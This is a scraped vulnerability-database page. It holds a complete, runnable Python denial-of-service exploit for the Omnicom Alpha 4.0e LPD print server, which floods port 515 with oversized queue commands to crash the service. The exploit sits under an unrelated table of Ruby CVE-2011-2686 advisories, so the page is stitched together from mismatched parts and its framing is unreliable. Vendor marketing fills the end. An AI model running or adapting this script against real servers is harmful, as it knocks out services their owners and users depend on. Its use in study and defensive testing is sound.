| Reporter | Title | Published | Views | Family All 57 |
|---|---|---|---|---|
| CVE-2011-2686 | 5 Aug 201121:00 | – | cve | |
| CVE-2011-2686 | 5 Aug 201121:00 | – | cvelist | |
| [SECURITY] [DLA 88-1] ruby1.8 security update | 21 Nov 201415:18 | – | debian | |
| Debian DLA-88-1 : ruby1.8 security update | 26 Mar 201500:00 | – | nessus | |
| Fedora 15 : ruby-1.8.7.352-1.fc15 (2011-9359) | 26 Jul 201100:00 | – | nessus | |
| Fedora 14 : ruby-1.8.7.352-1.fc14 (2011-9374) | 26 Jul 201100:00 | – | nessus | |
| Oracle Linux 8 : ruby:2.5 (ELSA-2023-7025) | 21 Nov 202300:00 | – | nessus | |
| Oracle Linux 8 : ruby:3.1 (ELSA-2025-4063) | 22 Apr 202500:00 | – | nessus | |
| Scientific Linux Security Update : ruby on SL6.x i386/x86_64 | 1 Aug 201200:00 | – | nessus | |
| Scientific Linux Security Update : ruby on SL4.x, SL5.x i386/x86_64 (20120130) | 1 Aug 201200:00 | – | nessus |
#!/usr/bin/python
#Title: Omnicom Alpha 4.0e LPD Server DoS
#Author: Craig Freyman (@cd1zz)
#Software Download: http://www.omnicomtech.com/download/bin/lpd.exe
#Tested on: Windows XP SP3 (English), Server 2003 SP2 (English)
#Dates: Bug Found 7/27/2011, Vendor Notified 8/1/2011, Vendor Responded 8/2/2011, Vendor approved release 8/3/2011
#Notes: For this exploit to work, you must know the name of a printer queue on the server.
import socket,sys,time
if len(sys.argv) < 3:
print "[-]Usage: %s <target addr> <queue name>" % sys.argv[0]
sys.exit(0)
target = sys.argv[1]
queue = sys.argv[2]
counter = 1
crash = "\x41" * 7500
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
while counter<=50:
print "[*] Left jab "+str(counter)+" times."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,515))
s.send("\x02"+queue+" "+crash+"LF")
time.sleep(.25)
counter+=1
except:
print "[-] "+target+" has been knocked out with a right hook!"
sys.exit(0)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation